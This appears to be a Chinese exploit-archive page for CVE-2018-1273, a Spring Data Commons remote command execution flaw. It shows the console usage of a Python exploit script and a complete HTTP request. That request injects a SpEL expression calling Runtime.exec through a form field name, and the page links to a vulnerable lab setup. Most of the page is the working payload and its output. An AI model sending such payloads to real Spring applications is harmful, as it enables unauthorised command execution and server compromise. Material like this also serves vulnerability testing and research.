关联漏洞
描述
Spring Data Commons RCE 远程命令执行漏洞
介绍
# CVE-2018-1273
Spring Data Commons RCE 远程命令执行漏洞
## usage

```
C:\Users\CTF\Desktop>python cve-2018-1273.py
______ ______ ___ ___ ______ ______ ________
/ ___/ | / / __/___|_ |/ _ < ( _ )___< /_ /_ /_ /
/ /__ | |/ / _//___/ __// // / / _ /___/ / __/ / //_ <
\___/ |___/___/ /____/\___/_/\___/ /_/____//_/____/
author: jas502n
example: http://10.10.20.166:8080/account
Set Url: http://10.10.20.166:8080/account
Cmd >>: touch /tmp/jas502n
405, May Have a CVE-2018-1273 vulnerability!
CVE-2018-1273 Vulnerability Exit!
Cmd >>:
```

## BurpSuite request:
```
POST /account HTTP/1.1
Host: 10.10.20.166:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Length: 96
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
cache-control: no-cache
Cookie: sidebar_collapsed=false
X-Forwarded-For: 127.0.0.2
Content-Type: application/x-www-form-urlencoded
name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('touch /tmp/jas502n')]=test
```
## 漏洞环境:
https://github.com/wearearima/poc-cve-2018-1273
```
mvn spring-boot:run
```
文件快照
[4.0K] /data/pocs/d7c3f6d0a15d1ba89dd5805f835b62989faa2b54
├── [2.8K] cve-2018-1273.py
├── [1.3K] README.md
├── [171K] test.jpg
├── [4.0K] Vulnerability-environment
│ ├── [ 11K] LICENSE
│ ├── [6.3K] mvnw
│ ├── [4.9K] mvnw.cmd
│ ├── [2.1K] pom.xml
│ ├── [1.3K] README.md
│ └── [4.0K] src
│ ├── [4.0K] main
│ │ ├── [4.0K] java
│ │ │ └── [4.0K] eu
│ │ │ └── [4.0K] arima
│ │ │ └── [4.0K] poccve20181273
│ │ │ ├── [ 331] PocCve20181273Application.java
│ │ │ └── [ 548] VulnerableController.java
│ │ └── [4.0K] resources
│ │ └── [ 0] application.properties
│ └── [4.0K] test
│ └── [4.0K] java
│ └── [4.0K] eu
│ └── [4.0K] arima
│ └── [4.0K] poccve20181273
│ └── [ 348] PocCve20181273ApplicationTests.java
└── [295K] web.jpg
13 directories, 13 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。